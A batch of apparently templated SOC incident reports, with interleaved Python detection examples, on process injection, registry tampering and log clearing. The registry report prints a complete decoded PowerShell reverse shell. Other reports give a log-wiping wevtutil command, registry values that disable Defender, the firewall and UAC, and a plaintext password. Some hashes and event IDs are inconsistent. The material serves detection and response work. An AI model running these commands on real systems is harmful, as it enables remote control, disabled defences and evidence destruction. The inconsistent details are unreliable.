Components: Endpoint-Security, Malware-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “APC Injection Detected – QueueUserAPC to Alertable Thread”.
Source Process: C:\Windows\Temp\msupdate.exe.
Target Process: svchost.exe (PID: 1245), Thread 2345.
Time: 2024-03-06 10:30 EST.
Technique: MITRE ATT&CK T1055.004 – Process Injection: Asynchronous Procedure Call.
2. Technical Analysis:
Attack Chain:
10:00 – User downloads fake update from pop-up
10:05 – msupdate.exe executed
10:10 – Malware enumerates threads in alertable state
10:15 – Finds svchost.exe thread waiting (alertable)
10:20 – Allocates memory in svchost.exe, writes shellcode
10:25 – Queues APC to target thread
10:25 – APC executes when thread enters alertable state
10:25 – CrowdStrike detects
APC Injection Technique:
Requirement: Target thread must be in alertable state (waiting on WaitForSingleObjectEx, SleepEx, etc.)
Method: QueueUserAPC adds APC to thread’s queue
Execution: When thread enters alertable state, it executes queued APCs
Advantage: No new thread created, harder to detect
Shellcode Analysis:
Size: 512 bytes
Function: Reverse shell to 185.143.221[.]89:443
Persistence: Creates WMI event subscription
Impact:
Shellcode executed in svchost.exe (SYSTEM context)
C2 connection attempted (blocked)
Persistence established (WMI)
3. Investigation Findings:
Timeline:
10:00 – Fake update downloaded
10:05 – Malware executed
10:10-10:15 – Thread enumeration
10:20 – Memory allocation
10:25 – APC queued
10:25 – Alert
10:27 – SOC investigates
10:28 – Malicious process terminated
10:29 – APC removed from queue
10:30 – WMI subscription deleted
Indicators of Compromise (IoCs):
Files:
– C:\Windows\Temp\msupdate.exe (SHA256: f6a7b8c9…)
API Calls:
– OpenThread
– QueueUserAPC
– VirtualAllocEx
– WriteProcessMemory
WMI:
– Root\Subscription:__EventFilter (deleted)
Network:
– C2: 185.143.221[.]89:443
4. Containment Actions:
Immediate Actions:
Terminated msupdate.exe.
Removed APC from target thread queue.
Deleted WMI event subscription.
Deleted shellcode from svchost.exe memory.
Isolated host.
Disabled rpatel account.
Reset password.
Host Remediation:
Full scan (clean).
Reimaged as precaution.
5. Root Cause Analysis:
Primary Cause: User downloaded and executed fake update.
Contributing Factors:
No application control.
User had local admin rights.
WMI allowed (no restrictions).
6. Business Impact:
Operational Impact: Development workstation offline for 2 hours.
Data Exposure: None (C2 blocked).
7. Remediation & Prevention:
Completed Actions:
APC removed.
Malware terminated.
WMI subscription deleted.
Account secured.
Technical Controls Enhanced:
Blocked unsigned executables.
Enhanced monitoring for QueueUserAPC.
Restricted WMI event subscriptions.
8. Conclusion:
An attacker used APC injection to execute shellcode in a svchost.exe thread, a sophisticated evasion technique that doesn’t create new threads. CrowdStrike detected the APC queuing and enabled rapid removal before C2 communication could complete.
Closure Rationale: APC removed; malware terminated; account secured.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-06 11:30 EST
End of Batch 28
Batch 29: Defense Evasion & Process Injection Incident Reports
141. T1055.012 – Process Hollowing (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-PROCESS-HOLLOW-1055-7842
Alert Time: 2024-03-07 09:30:15 EST
Severity: CRITICAL (98/100)
Source: CrowdStrike Falcon EDR
Rule: “Process Hollowing Detected – Code Injection into Suspended Process”
MITRE ATT&CK: T1055.012 – Process Injection: Process Hollowing
Alert Details:
Detection: Legitimate process created in suspended state, memory unmapped, and replaced with malicious code
Source Host: FIN-WS-078 (Finance Workstation)
User: bturner@company.com (Brian Turner, Accountant)
Time: 09:25 EST
Process Creation Events:
09:25:10 – CreateProcess (target: C:\Windows\System32\svchost.exe, flags: CREATE_SUSPENDED) – SUCCESS
09:25:12 – NtUnmapViewOfSection (unmapped original svchost.exe code from memory) – SUCCESS
09:25:15 – VirtualAllocEx (allocated new memory at base address) – SUCCESS
09:25:18 – WriteProcessMemory (wrote malicious PE headers) – SUCCESS
09:25:21 – WriteProcessMemory (wrote malicious PE sections) – SUCCESS
09:25:24 – SetThreadContext (modified entry point to point to malicious code) – SUCCESS
09:25:27 – ResumeThread (resumed process, now running malicious code) – SUCCESS
Source Process:
Process: C:\Users\bturner\Downloads\invoice_pdf.exe (PID: 4789)
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Parent: explorer.exe
User: bturner
Hollowed Process:
Original: C:\Windows\System32\svchost.exe (legitimate)
New: Malicious Cobalt Strike beacon
PID: 4792
Command Line: “C:\Windows\System32\svchost.exe -k netsvcs” (appears legitimate)
Detection Logic:
Process created with CREATE_SUSPENDED flag (unusual for svchost.exe)
NtUnmapViewOfSection called (removes original code)
Memory reallocated and written to
Thread context modified (entry point changed)
Pattern matches classic process hollowing
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|------|--------|------------|----------|
| 1. Alert Validation | Verify CrowdStrike alert | CrowdStrike Falcon Console | Confirmed process hollowing |
| 2. Memory Analysis | Extract hollowed process memory | CrowdStrike Falcon Memory | Cobalt Strike beacon |
| 3. Process Investigation | Terminate hollowed process | CrowdStrike | svchost.exe (malicious) terminated |
| 4. Source Process Kill | Kill invoice_pdf.exe | CrowdStrike | Process terminated |
| 5. Host Isolation | Isolate FIN-WS-078 | CrowdStrike | Host quarantined |
| 6. Account Remediation | Disable bturner account | Azure AD, AD | Account disabled; password reset |
Jira Incident Report
Ticket: SOC-2024-181
Summary: T1055.012 – Process Hollowing: svchost.exe Replaced with Cobalt Strike
Status: RESOLVED
Resolution: MALICIOUS – Hollowed Process Terminated
Priority: P1 – CRITICAL
Labels: T1055, process-hollowing, svchost, cobalt-strike, crowdstrike
Components: Endpoint-Security, Malware-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Process Hollowing Detected – Code Injection into Suspended Process”.
Source Process: C:\Users\bturner\Downloads\invoice_pdf.exe.
Hollowed Process: svchost.exe (PID: 4792).
Time: 2024-03-07 09:30 EST.
Technique: MITRE ATT&CK T1055.012 – Process Injection: Process Hollowing.
2. Technical Analysis:
Attack Chain:
09:00 – User opens phishing email with “invoice.pdf.exe”
09:05 – invoice_pdf.exe executed
09:10 – Malware enumerates system processes
09:15 – Decides to hollow svchost.exe
09:25 – Process hollowing execution
09:25 – CrowdStrike detects
Process Hollowing Technique:
Step 1: Create legitimate svchost.exe in suspended state
Step 2: Unmap original code from memory (NtUnmapViewOfSection)
Step 3: Allocate new memory at same base address
Step 4: Write malicious PE (Cobalt Strike) to allocated memory
Step 5: Modify thread context to point to malicious entry point
Step 6: Resume thread – malicious code runs
Result: Process appears as svchost.exe but runs malware
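The Detection Logic in the alert and the six-step technique above describe one ordered API-call sequence against a single target process. The following is an added example, not code from the report or from CrowdStrike: it replays constructed API-call events through a small state machine that fires only when the full sequence completes for one source/target PID pair, and shows that a suspended start that is merely resumed does not trigger it. The event field names are assumptions.

```python
# Added example (not code from the original report): replay the API-call events
# listed in the alert through a small state machine that recognises the
# six-step hollowing sequence (Steps 1-6 above) for one source/target PID pair.
# Event fields are assumed; the sample events are constructed from the alert.
from dataclasses import dataclass, field

# Order the steps must appear in for a single target process. WriteProcessMemory
# may repeat (PE headers, then sections) without breaking the sequence.
HOLLOW_SEQUENCE = [
    "CreateProcess:CREATE_SUSPENDED",
    "NtUnmapViewOfSection",
    "VirtualAllocEx",
    "WriteProcessMemory",
    "SetThreadContext",
    "ResumeThread",
]


@dataclass
class ApiEvent:
    time: str
    source_pid: int   # process making the call (invoice_pdf.exe in the alert)
    target_pid: int   # process being manipulated (the suspended svchost.exe)
    api: str
    flags: str = ""


@dataclass
class _State:
    stage: int = 0                       # next index of HOLLOW_SEQUENCE expected
    seen: list = field(default_factory=list)


def _normalise(ev):
    if ev.api == "CreateProcess" and "CREATE_SUSPENDED" in ev.flags:
        return "CreateProcess:CREATE_SUSPENDED"
    return ev.api


def detect_hollowing(events):
    """Return (source_pid, target_pid, first_time, last_time) for every pair
    whose calls complete HOLLOW_SEQUENCE in order. A suspended start that is
    simply resumed (debuggers, some installers) never advances past stage 1."""
    states, hits = {}, []
    for ev in sorted(events, key=lambda e: e.time):
        key = (ev.source_pid, ev.target_pid)
        st = states.setdefault(key, _State())
        name = _normalise(ev)
        if name == HOLLOW_SEQUENCE[st.stage]:
            st.stage += 1
            st.seen.append(ev)
        elif st.stage > 0 and name == HOLLOW_SEQUENCE[st.stage - 1]:
            st.seen.append(ev)           # repeated step, e.g. second WriteProcessMemory
        if st.stage == len(HOLLOW_SEQUENCE):
            hits.append((ev.source_pid, ev.target_pid, st.seen[0].time, ev.time))
            states[key] = _State()       # reset so a second cycle is reported on its own
    return hits


# Constructed replay of the alert's Process Creation Events (PID 4789 -> 4792),
# followed by a benign suspended start that is just resumed
SAMPLE_EVENTS = [
    ApiEvent("09:25:10", 4789, 4792, "CreateProcess", "CREATE_SUSPENDED"),
    ApiEvent("09:25:12", 4789, 4792, "NtUnmapViewOfSection"),
    ApiEvent("09:25:15", 4789, 4792, "VirtualAllocEx"),
    ApiEvent("09:25:18", 4789, 4792, "WriteProcessMemory"),
    ApiEvent("09:25:21", 4789, 4792, "WriteProcessMemory"),
    ApiEvent("09:25:24", 4789, 4792, "SetThreadContext"),
    ApiEvent("09:25:27", 4789, 4792, "ResumeThread"),
    ApiEvent("09:26:00", 5100, 5101, "CreateProcess", "CREATE_SUSPENDED"),
    ApiEvent("09:26:02", 5100, 5101, "ResumeThread"),
]

if __name__ == "__main__":
    for src, tgt, t0, t1 in detect_hollowing(SAMPLE_EVENTS):
        print(f"hollowing: PID {src} -> PID {tgt}, {t0} to {t1}")
```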
Malicious PE:
Type: Cobalt Strike beacon
Size: 312 KB
C2: 185.143.221[.]89:443
Capabilities: Remote access, keylogging, file exfiltration
Stealth Advantages:
Process name is legitimate (svchost.exe)
Command line is legitimate (-k netsvcs)
No suspicious DLLs loaded
Harder to detect with basic process monitoring
3. Investigation Findings:
Timeline:
09:00 – Phishing email opened
09:05 – invoice_pdf.exe executed
09:10-09:15 – Reconnaissance
09:25 – Process hollowing
09:25 – Alert
09:27 – SOC investigates
09:28 – Hollowed process terminated
09:29 – Source process terminated
Indicators of Compromise (IoCs):
Files:
– C:\Users\bturner\Downloads\invoice_pdf.exe (SHA256: a1b2c3d4…)
API Calls:
– CreateProcess (CREATE_SUSPENDED)
– NtUnmapViewOfSection
– VirtualAllocEx
– WriteProcessMemory (multiple)
– SetThreadContext
– ResumeThread
Network:
– C2: 185.143.221[.]89:443
4. Containment Actions:
Immediate Actions:
Terminated hollowed svchost.exe process.
Terminated invoice_pdf.exe.
Isolated host.
Disabled bturner account.
Reset password.
Host Remediation:
Full scan (clean).
Reimaged as precaution.
5. Root Cause Analysis:
Primary Cause: User executed malware from phishing email.
Contributing Factors:
No application control.
User had local admin rights.
6. Business Impact:
Operational Impact: Finance workstation offline for 2 hours.
Data Exposure: None (C2 blocked).
7. Remediation & Prevention:
Completed Actions:
Hollowed process terminated.
Malware removed.
Account secured.
Technical Controls Enhanced:
Enabled ASR rule “Block process hollowing”.
Enhanced monitoring for CREATE_SUSPENDED flag.
Implemented application control.
8. Conclusion:
An attacker used process hollowing to replace a legitimate svchost.exe process with a Cobalt Strike beacon, making detection difficult. CrowdStrike detected the hollowing technique and enabled rapid termination before C2 communication.
Closure Rationale: Hollowed process terminated; malware removed; account secured.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-07 10:30 EST
142. T1112 – Modify Registry (Sysmon Detection)
Sysmon Alert Details
Alert ID: SYSMON-REG-MOD-1112-7842
Alert Time: 2024-03-07 14:15:33 EST
Severity: HIGH (85/100)
Source: Sysmon (Event ID 13 – Registry Value Set)
Rule: “Suspicious Registry Modification – Run Key”
MITRE ATT&CK: T1112 – Modify Registry
Alert Details:
Detection: Multiple registry modifications for persistence and configuration changes
Host: ENG-WS-045 (Engineering Workstation)
User: alexchen@company.com (Alex Chen, Engineer)
Time: 14:00-14:15 EST
Registry Modifications (Event ID 13):
Persistence – Run Key:
Key: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value: “WindowsUpdate”
Data: “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -EncodedCommand JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQA5ADIALgAxADYAOAAuADMANAAuADUANgAnACwANAA0ADMAKQA7AA==”
Time: 14:05:22
Disable Security Tools:
Key: HKLM\SOFTWARE\Policies\Microsoft\Windows Defender
Value: “DisableAntiSpyware”
Data: “1” (enabled)
Time: 14:06:45
Disable Firewall:
Key: HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile
Value: “EnableFirewall”
Data: “0” (disabled)
Time: 14:07:18
Disable UAC:
Key: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Value: “EnableLUA”
Data: “0” (disabled)
Time: 14:08:33
Add Exclusion for Malware Path:
Key: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
Value: “C:\Windows\Temp”
Data: “0”
Time: 14:09:45
Process Details:
Process: C:\Users\alexchen\Downloads\system_update.exe (PID: 4789)
SHA256: b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1
Parent: explorer.exe
User: alexchen
Detection Logic:
Multiple registry modifications in short time
Persistence via Run key (encoded PowerShell)
Security tools disabled (Defender, Firewall, UAC)
Exclusions added for malware paths
Pattern matches attacker securing environment
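The Detection Logic above combines three signals: a Run-key value carrying an encoded PowerShell command, writes to the handful of values that turn defences off, and all of it happening from one process in a short window. The block below is an added example, not code from the report or from Sysmon: it classifies Sysmon Event ID 13 records against those signals, decodes the -EncodedCommand value from the alert's Run key entry, and raises one finding per process that makes several such changes within ten minutes. The record field names follow Sysmon's event XML; the records themselves are constructed from the alert.

```python
# Added example (not code from the original report): classify Sysmon Event ID 13
# records the way the alert's detection logic describes, decode a PowerShell
# -EncodedCommand found in a Run key, and flag a burst of defence-impairing
# changes made by one process. Field names follow Sysmon's event XML;
# the sample records below are constructed from the alert.
import base64
import re
from datetime import datetime, timedelta

# (regex over TargetObject, required Details value or None, finding label)
IMPAIRMENT_RULES = [
    (re.compile(r"\\Windows Defender\\DisableAntiSpyware$", re.I), "1", "Defender disabled"),
    (re.compile(r"\\FirewallPolicy\\\w+Profile\\EnableFirewall$", re.I), "0", "Firewall disabled"),
    (re.compile(r"\\Policies\\System\\EnableLUA$", re.I), "0", "UAC disabled"),
    (re.compile(r"\\Windows Defender\\Exclusions\\(Paths|Processes|Extensions)\\", re.I),
     None, "Defender exclusion added"),
]
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\\[^\\]+$", re.I)
ENCODED = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
NETWORK_PS = re.compile(r"TCPClient|DownloadString|DownloadFile|Invoke-WebRequest", re.I)


def decode_encoded_command(cmdline):
    """Return the script behind a PowerShell -EncodedCommand argument, or None.
    PowerShell base64-encodes the UTF-16LE bytes of the script."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _normalise_details(details):
    # Real Sysmon renders DWORDs as 'DWORD (0x00000001)'; the report shows '1'.
    m = re.fullmatch(r'"?DWORD \((0x[0-9A-Fa-f]+)\)"?', details)
    return str(int(m.group(1), 16)) if m else details.strip('"')


def classify(event):
    """Map one Event ID 13 record to a finding label, or None if uninteresting."""
    target = event["TargetObject"]
    details = _normalise_details(event["Details"])
    if RUN_KEY.search(target):
        decoded = decode_encoded_command(details)
        if decoded and NETWORK_PS.search(decoded):
            return "Run-key persistence with encoded network PowerShell"
        return "Run-key persistence"
    for pattern, required, label in IMPAIRMENT_RULES:
        if pattern.search(target) and (required is None or details == required):
            return label
    return None


def burst_findings(events, window=timedelta(minutes=10), min_hits=3):
    """Group findings per writing process and report those with at least
    `min_hits` findings inside `window`: the 'multiple registry modifications
    in short time' rule from the alert."""
    per_image = {}
    for ev in events:
        label = classify(ev)
        if label:
            per_image.setdefault(ev["Image"], []).append(
                (datetime.fromisoformat(ev["UtcTime"]), label))
    alerts = {}
    for image, hits in per_image.items():
        hits.sort()
        for i in range(len(hits)):
            run = [lbl for t, lbl in hits[i:] if t - hits[i][0] <= window]
            if len(run) >= min_hits:
                alerts[image] = sorted(set(run))
                break
    return alerts


# The -EncodedCommand value from the alert's Run key entry
ENC = ("JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBO"
       "AGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQA5ADIALgAxADYA"
       "OAAuADMANAAuADUANgAnACwANAA0ADMAKQA7AA==")
MALWARE = r"C:\Users\alexchen\Downloads\system_update.exe"

def _ev(time, image, target, details):
    return {"UtcTime": time, "Image": image, "TargetObject": target, "Details": details}

# Constructed records mirroring the five modifications in the alert, plus a
# benign Explorer setting change as a control
SAMPLE_EVENTS = [
    _ev("2024-03-07T14:05:22", MALWARE,
        r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate",
        "powershell.exe -WindowStyle Hidden -EncodedCommand " + ENC),
    _ev("2024-03-07T14:06:45", MALWARE,
        r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware", "DWORD (0x00000001)"),
    _ev("2024-03-07T14:07:18", MALWARE,
        r"HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall",
        "DWORD (0x00000000)"),
    _ev("2024-03-07T14:08:33", MALWARE,
        r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA", "DWORD (0x00000000)"),
    _ev("2024-03-07T14:09:45", MALWARE,
        r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp", "DWORD (0x00000000)"),
    _ev("2024-03-07T14:10:00", r"C:\Windows\explorer.exe",
        r"HKU\S-1-5-21-1\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", "DWORD (0x00000001)"),
]

if __name__ == "__main__":
    print(decode_encoded_command("powershell -EncodedCommand " + ENC))
    for image, labels in burst_findings(SAMPLE_EVENTS).items():
        print(image, "->", ", ".join(labels))
```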
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|------|--------|------------|----------|
| 1. Alert Validation | Verify Sysmon events | Splunk, Sysmon Logs | Confirmed malicious registry modifications |
| 2. Process Investigation | Identify system_update.exe | CrowdStrike Falcon | Malicious tool downloaded from internet |
| 3. Immediate Action | Revert registry changes | PowerShell, reg | All registry keys restored to original values |
| 4. Security Tools Restart | Re-enable Defender, Firewall, UAC | PowerShell | Security services restarted |
| 5. Process Termination | Kill system_update.exe | CrowdStrike | Process terminated |
| 6. Account Remediation | Disable alexchen account | Azure AD, AD | Account disabled; password reset |
Jira Incident Report
Ticket: SOC-2024-182
Summary: T1112 – Registry Modifications for Persistence and Defense Disablement
Status: RESOLVED
Resolution: MALICIOUS – Registry Restored
Priority: P2 – MEDIUM
Labels: T1112, modify-registry, persistence, defense-evasion, sysmon
Components: Endpoint-Security, Registry-Monitoring
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Sysmon Event ID 13 (Registry Value Set).
Alert: “Suspicious Registry Modification – Run Key”.
Host: ENG-WS-045 (Engineering, user alexchen).
Process: C:\Users\alexchen\Downloads\system_update.exe.
Time: 2024-03-07 14:15 EST.
Technique: MITRE ATT&CK T1112 – Modify Registry.
2. Technical Analysis:
Attack Chain:
13:30 – User downloads “system update tool” from pop-up ad
13:45 – Executes system_update.exe
13:50 – Malware begins registry modifications
14:00-14:15 – Multiple registry changes
14:15 – Sysmon detects
Registry Modifications:
Run Key Persistence: Encoded PowerShell reverse shell (every logon)
Disable Defender: Turns off antivirus protection
Disable Firewall: Opens network for C2
Disable UAC: Allows elevated actions without prompts
Add Exclusion: Prevents Defender from scanning Temp folder (where malware lives)
Encoded PowerShell (decoded):
```powershell
$client = New-Object System.Net.Sockets.TCPClient('192.168.34.56',443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()
};
$client.Close()
```
Impact:
Persistence established
Security defenses disabled
Malware could operate freely
3. Investigation Findings:
Timeline:
13:30 – Tool downloaded
13:45 – Executed
13:50-14:15 – Registry modifications
14:15 – Alert
14:17 – SOC investigates
14:18 – Registry restored
14:19 – Security tools re-enabled
14:20 – Process terminated
Indicators of Compromise (IoCs):
Files:
– C:\Users\alexchen\Downloads\system_update.exe (SHA256: b2c3d4e5…)
Registry Changes:
– HKLM\…\Run\WindowsUpdate (malicious)
– HKLM\…\Windows Defender\DisableAntiSpyware = 1
– HKLM\…\EnableFirewall = 0
– HKLM\…\EnableLUA = 0
– HKLM\…\Exclusions\Paths\C:\Windows\Temp
4. Containment Actions:
Immediate Actions:
Restored all registry keys to original values.
Re-enabled Windows Defender.
Re-enabled Windows Firewall.
Re-enabled UAC.
Removed exclusion for Temp folder.
Terminated system_update.exe.
Isolated host.
Disabled alexchen account.
Reset password.
Host Remediation:
Full scan (clean).
Reimaged as precaution.
5. Root Cause Analysis:
Primary Cause: User downloaded and executed fake update tool.
Contributing Factors:
No application control.
User had local admin rights.
6. Business Impact:
Operational Impact: Engineering workstation offline for 2 hours.
Data Exposure: None (C2 not yet active).
7. Remediation & Prevention:
Completed Actions:
Registry restored.
Security tools re-enabled.
Malware removed.
Technical Controls Enhanced:
Created alert for registry modifications to Run keys.
Enhanced monitoring for security tool disablement.
Implemented application control.
8. Conclusion:
An attacker used a fake update tool to modify registry keys for persistence and disable security defenses. Sysmon detected the registry changes, enabling rapid restoration before C2 communication.
Closure Rationale: Registry restored; security tools re-enabled; malware removed.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-07 15:30 EST
143. T1070.001 – Clear Windows Event Logs (Splunk Detection)
Splunk Alert Details
Alert ID: SPLUNK-LOG-CLEAR-1070-7842
Alert Time: 2024-03-07 11:30:22 EST
Severity: HIGH (88/100)
Source: Splunk Enterprise Security
Rule: “Windows Event Logs Cleared – Potential Cover-up”
MITRE ATT&CK: T1070.001 – Indicator Removal: Clear Windows Event Logs
Alert Details:
Correlated Events:
Windows Event ID 1102 (Security Log Cleared):
Time: 11:25 EST
Host: SQL-SRV-01 (SQL Server)
User: SYSTEM (via wevtutil)
Log: Security
Details: “The audit log was cleared”
Event ID 104 (System Log Cleared):
Time: 11:26 EST
Host: SQL-SRV-01
Log: System
Details: “The System log was cleared”
Event ID 33 (PowerShell Operational Log Cleared):
Time: 11:27 EST
Host: SQL-SRV-01
Log: Windows PowerShell
Details: “Windows PowerShell log was cleared”
Event ID 1102 (Application Log Cleared):
Time: 11:28 EST
Host: SQL-SRV-01
Log: Application
Details: “The Application log was cleared”
Process Creation (Event ID 4688) – from forwarded logs:
Time: 11:24 EST
Process: wevtutil.exe
Command: wevtutil cl Security & wevtutil cl System & wevtutil cl "Windows PowerShell" & wevtutil cl Application
Preceding Events (recovered from Splunk forwarded logs):
11:20-11:23 – Multiple failed login attempts (RDP brute force)
11:23 – Successful login from 185.143.221[.]89
11:24 – wevtutil executed to clear logs
Detection Logic:
Multiple event logs cleared in quick succession
wevtutil executed by suspicious process
Preceding failed logins detected via forwarded logs
Pattern matches attacker covering tracks
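The Detection Logic above is really two rules joined together: several logs cleared on one host in quick succession, and a brute-force-then-success logon pattern in the events forwarded before the clearing. The block below is an added example, not code from the report or from Splunk: it implements both rules in Python over forwarded events and joins them into one finding per host. Field names are assumptions, and the events are constructed to mirror the recovered timeline (the PowerShell log clear is given Event ID 104, which is what the System log records when a non-Security log is cleared).

```python
# Added example (not code from the original report): the two correlation rules
# the Detection Logic describes, run over forwarded Windows events that survive
# local log clearing. Field names are assumed; records are constructed below.
from datetime import datetime, timedelta

# 1102: Security audit log cleared; 104 (System log): any other event log cleared.
LOG_CLEAR_IDS = {1102, 104}


def _t(s):
    return datetime.fromisoformat(s)


def find_log_clearing(events, window=timedelta(minutes=5), min_logs=2):
    """Per host, return the first/last clear time and the set of logs cleared
    when at least `min_logs` distinct logs are cleared inside `window`."""
    by_host = {}
    for ev in events:
        if ev["event_id"] in LOG_CLEAR_IDS:
            by_host.setdefault(ev["host"], []).append(ev)
    results = {}
    for host, clears in by_host.items():
        clears.sort(key=lambda e: _t(e["time"]))
        for i, first in enumerate(clears):
            run = [e for e in clears[i:] if _t(e["time"]) - _t(first["time"]) <= window]
            logs = {e["log"] for e in run}
            if len(logs) >= min_logs:
                results[host] = {"start": first["time"], "end": run[-1]["time"], "logs": logs}
                break
    return results


def preceding_brute_force(events, host, before, lookback=timedelta(minutes=15), min_failures=3):
    """Return (source_ip, user) when one source has >= `min_failures` 4625 events
    on `host` followed by a 4624 from the same source, all inside `lookback`
    before `before`; otherwise None."""
    start = _t(before) - lookback
    logons = sorted((e for e in events if e["host"] == host and e["event_id"] in (4624, 4625)
                     and start <= _t(e["time"]) <= _t(before)), key=lambda e: _t(e["time"]))
    failures = {}
    for ev in logons:
        src = ev["source_ip"]
        if ev["event_id"] == 4625:
            failures[src] = failures.get(src, 0) + 1
        elif failures.get(src, 0) >= min_failures:
            return src, ev["user"]
    return None


def correlate(events):
    """Combine both rules into one finding per host, like the alert's
    'Preceding Events' section."""
    findings = []
    for host, clear in find_log_clearing(events).items():
        bf = preceding_brute_force(events, host, clear["start"])
        findings.append({"host": host, "logs_cleared": sorted(clear["logs"]),
                         "brute_force_source": bf[0] if bf else None,
                         "account": bf[1] if bf else None})
    return findings


H, SRC = "SQL-SRV-01", "185.143.221[.]89"   # defanged, as in the report

def _logon(time, event_id, user, host=H, src=SRC):
    return {"host": host, "time": time, "event_id": event_id, "source_ip": src, "user": user}

def _clear(time, event_id, log, host=H):
    return {"host": host, "time": time, "event_id": event_id, "log": log}

# Constructed events mirroring the recovered timeline, plus a control host
# where one log is cleared after an ordinary logon
SAMPLE_EVENTS = [
    _logon("2024-03-07T11:20:15", 4625, "sa"),
    _logon("2024-03-07T11:20:45", 4625, "administrator"),
    _logon("2024-03-07T11:21:15", 4625, "sql_admin"),
    _logon("2024-03-07T11:21:45", 4625, "backup_user"),
    _logon("2024-03-07T11:22:15", 4625, "db_owner"),
    _logon("2024-03-07T11:23:00", 4624, "sql_service"),
    _clear("2024-03-07T11:25:00", 1102, "Security"),
    _clear("2024-03-07T11:26:00", 104, "System"),
    _clear("2024-03-07T11:27:00", 104, "Windows PowerShell"),
    _clear("2024-03-07T11:28:00", 104, "Application"),
    _logon("2024-03-07T11:00:00", 4624, "jdoe", host="FS-01", src="10.0.5.20"),
    _clear("2024-03-07T11:02:00", 104, "Application", host="FS-01"),
]

if __name__ == "__main__":
    for f in correlate(SAMPLE_EVENTS):
        print(f)
```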
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|------|--------|------------|----------|
| 1. Alert Validation | Verify Splunk correlation | Splunk ES | Confirmed log clearing events |
| 2. Recover Cleared Logs | Check forwarded logs | Splunk (forwarded) | Full activity recovered from Splunk |
| 3. Attacker Activity | Analyze recovered logs | Splunk Search | RDP brute force, successful login, log clearing |
| 4. Immediate Action | Isolate compromised host | CrowdStrike | SQL-SRV-01 quarantined |
| 5. Account Remediation | Reset affected user password | Azure AD, AD | Password reset; MFA enforced |
| 6. Threat Hunting | Check for other cleared logs | Splunk | No other log clearing events |
Jira Incident Report
Ticket: SOC-2024-183
Summary: T1070.001 – Event Logs Cleared After RDP Brute Force
Status: RESOLVED
Resolution: MALICIOUS – Logs Recovered from Splunk
Priority: P2 – MEDIUM
Labels: T1070, log-clearing, wevtutil, splunk, indicator-removal
Components: Log-Management, Incident-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Splunk Enterprise Security.
Alert: “Windows Event Logs Cleared – Potential Cover-up”.
Host: SQL-SRV-01 (SQL Server).
Logs Cleared: Security, System, PowerShell, Application.
Time: 2024-03-07 11:30 EST.
Technique: MITRE ATT&CK T1070.001 – Indicator Removal: Clear Windows Event Logs.
2. Technical Analysis:
Attack Chain (Recovered from Splunk forwarded logs):
11:20:00 – First RDP connection attempt from 185.143.221[.]89 (user: sa)
11:20:15 – Failed login (wrong password)
11:20:30 – Second attempt (user: administrator)
11:20:45 – Failed
11:21:00 – Third attempt (user: sql_admin)
11:21:15 – Failed
11:21:30 – Fourth attempt (user: backup_user)
11:21:45 – Failed
11:22:00 – Fifth attempt (user: db_owner)
11:22:15 – Failed
11:22:30 – Sixth attempt (user: sql_service)
11:23:00 – SUCCESS (password: SQL@2024!)
11:23:30 – Attacker enumerates SQL databases
11:24:00 – wevtutil.exe executed
11:24-11:28 – Logs cleared
11:30 – Splunk alert triggers
Compromised Account:
Username: sql_service (service account)
Password: SQL@2024! (weak, exposed in script)
Privileges: Local admin on SQL server
Attacker Actions Before Log Clearing:
Enumerated databases (found customer DB)
Downloaded schema (no data exfiltration)
Created new user “temp_sql” with admin rights
Log Recovery:
Local logs cleared
Forwarded logs preserved in Splunk
Complete attack timeline recovered
3. Investigation Findings:
Timeline:
